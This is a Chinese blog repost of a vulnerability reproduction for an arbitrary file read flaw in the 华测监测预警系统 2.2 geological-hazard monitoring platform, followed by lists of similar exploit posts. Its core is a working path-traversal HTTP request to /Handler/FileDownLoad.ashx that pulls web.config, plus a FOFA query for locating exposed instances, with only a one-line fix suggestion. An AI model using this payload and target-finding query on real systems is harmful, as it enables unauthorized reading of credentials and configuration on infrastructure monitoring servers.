华测监测预警系统 2.2 存在任意文件读取漏洞 - 代码天地

华测监测预警系统 2.2 存在任意文件读取漏洞

编程语言 2023-12-17 10:36:33 阅读次数: 0

华测监测预警系统 2.2 存在任意文件读取漏洞

一、华测监测预警系统 2.2 简介
二、漏洞描述
三、影响版本
四、fofa查询语句
五、漏洞复现
- 1、手动复现
- 2、自动复现
六、修复建议

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、华测监测预警系统 2.2 简介

华测监测预警系统是一套科学完善的地质灾害监测预警平台，实现了地质灾害防治管理的科学化、信息化、标准化和可视化。

二、漏洞描述

华测监测预警系统 2.2 存在任意文件读取漏洞，通过该漏洞可以读取敏感信息文件。

三、影响版本

华测监测预警系统 2.2
在这里插入图片描述

四、fofa查询语句

app=“华测监测预警系统2.2”

五、漏洞复现

1、手动复现

漏洞链接：http://127.0.0.1/Handler/FileDownLoad.ashx

漏洞数据包：

POST /Handler/FileDownLoad.ashx HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

filename=1&filepath=..%2F..%2Fweb.config

在这里插入图片描述

2、自动复现

小龙POC一通哈拉少
在这里插入图片描述

扫描二维码关注公众号，回复： 17216304 查看本文章

六、修复建议

升级版本
屏蔽敏感代码执行

猜你喜欢

转载自blog.csdn.net/holyxp/article/details/133746079

华测监测预警系统 2.2 存在任意文件读取漏洞

艾科思应用接入系统存在任意文件读取漏洞

深信服应用交付报表系统存在任意文件读取漏洞

漏洞复现-某友CRM系统某接口存在任意文件读取（附漏洞检测脚本）

某微e-office协同管理系统存在任意文件读取漏洞复现 CNVD-2022-07603

某微e-office协同管理系统存在任意文件读取漏洞分析 CNVD-2022-07603

金某OA协同办公管理系统存在任意文件下载漏洞分析 CNVD-2021-43036

金某OA协同办公管理系统存在任意文件下载漏洞复现 CNVD-2021-43036

蓝凌OA存在任意文件读取漏洞

复现用友CRM系统任意文件读取漏洞

某计费管理系统任意文件读取漏洞

2.2 Linux文件系统

漏洞复现-iDocview某接口存在任意文件读取漏洞（附漏洞检测脚本）

华平信息技术股份有限公司 AVCON6 系统管理平台存在任意文件下载漏洞

梦想cms v1.4 后台存在任意文件读取漏洞

畅捷通TPlus DownloadProxy.aspx 存在任意文件读取漏洞

【1day】复现LiveBOS ShowImage.do 接口存在任意文件读取漏洞

畅捷通TPlus DownloadProxy.aspx 存在任意文件读取漏洞附POC

zeroshell防火墙存在任意文件读取漏洞

【中危】Apache Airflow Drill Provider ＜ 2.4.3 存在任意文件读取漏洞

2023最新 chromium 内核存在任意文件读取0day 漏洞！(附exp)

漏洞复现-iDocview doc/upload接口存在任意文件读取漏洞（附漏洞检测脚本）

【漏洞复现】泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现

绿盟sas安全审计系统任意文件读取漏洞

CVE-2020-8209（Citrix Endpoint Management ）XenMobile-控制台存在任意文件读取漏洞

春秋云境：CVE-2022-23316（taoCMS v3.0.2 存在任意文件读取漏洞）

关于 WordPress 任意文件删除漏洞安全预警通知

深信服 SG上网优化管理系统 catjs.php 任意文件读取漏洞[2023-HW]

【1day】复现时空智友企业流程化管控系统任意文件读取漏洞

Windows系统在任意文件夹下打开cmd命令快捷方法

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

《2024 年一季度互联网投融资运行情况》研究报告

报告：Django 仍然是 74% 开发者的首选

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

记一下去大梅沙的准备（2018-05-26）

Spring 注解事务

基于HTTP协议的客户端缓存

阿里云rds 备份和还原

[PHP] 几个拖慢 PHP 程序/API 运行速度的点

python 代码风格------------PEP8规则

js控制json生成菜单——自制菜单（一）

将字符串: 'k:1|k1:2|k2:3|k3:4 ' ,处理成 python 字典: {'k':1, 'k1':2, ...}

微信小程序转支付宝小程序

Qt551.窗口滚动条

每日归档

更多

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)